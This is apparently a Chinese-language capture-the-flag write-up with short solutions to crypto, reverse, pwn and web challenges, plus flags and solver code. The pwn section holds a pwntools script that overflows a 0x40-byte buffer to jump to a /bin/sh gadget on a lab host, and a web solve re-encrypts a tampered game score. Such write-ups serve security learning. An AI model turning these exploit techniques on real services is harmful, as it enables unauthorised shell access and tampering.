文档里给了 key 和 iv,后缀改.zip 得到密文 vhuuzRIJ7lQmIKpAts3n5HnxQufypuGJ566ezmFFWoRnQQiTyGBYo3fQoXYjVmOL,DES 解密得到 flag
flag{d17c3ebe-9295-11ef-b33d-e7635ce82117}
Crypto
Xor
CyberChef 直接 Xor Brute 出 flag
babyRsa
一开始以为要爆 n 得 p q,仔细一看给 d 了,c d n 直接出,痛失一血
1 2 3 4 5 6 7 8 9 10 11 12 13 14
from gmpy2 import invert from Crypto.Util.number import bytes_to_long,long_to_bytes,getPrime
m1 = b'*******************************' d =65537 c =58281986026155401653961791566565447945093060846820356613308332714858279014947481661513787576640319037284520744272633213837354707251964956768815265455459826395564460354962857046350158054400893455735780422516856340337329601705254356434888404803272789503473262409379224212483785361817211613590386267074478685966 n =62964295532234596693070018099070937019057164562112987091452887688141225085952321398697412374016096377122640058110868098037471603391390346233746234875640515398310934392553495004416513284691840371990557141082495349961527283652278396378415965015641029062902024667272908555073658903317411899735684224720763682691 print(long_to_bytes(pow(c,d,n)))
''' c = 58281986026155401653961791566565447945093060846820356613308332714858279014947481661513787576640319037284520744272633213837354707251964956768815265455459826395564460354962857046350158054400893455735780422516856340337329601705254356434888404803272789503473262409379224212483785361817211613590386267074478685966
n = 62964295532234596693070018099070937019057164562112987091452887688141225085952321398697412374016096377122640058110868098037471603391390346233746234875640515398310934392553495004416513284691840371990557141082495349961527283652278396378415965015641029062902024667272908555073658903317411899735684224720763682691 '''
Reverse
checkin
base64 换表,Shift F12 就有 送分题
Pwn
backdoor
后门一把梭,0x40 的 buf,0x401216 的/bin/sh
1 2 3 4 5 6 7
from pwn import *
p=remote("10.240.0.11",12436) p.recvuntil(b"Do you know what stack overflow is? \n") payload = b"a"*0x40+b"a"*0x8 +p64(0x401216) p.sendline(payload) p.interactive()
Web
dino
F12 网络能看到 game over 时请求了 api.php,发起于 offline.js 的 1463 多行,查看此处代码得到 key iv,aes 解密后修改分数为 10001 重新加密请求得到 flag
Test Your Hamburger
差不多算 web 签到
recover
db.php 中的密码被修改,html.zip 中得到正确的数据库密码,连接数据库查看 blog 的 posts 表得到提示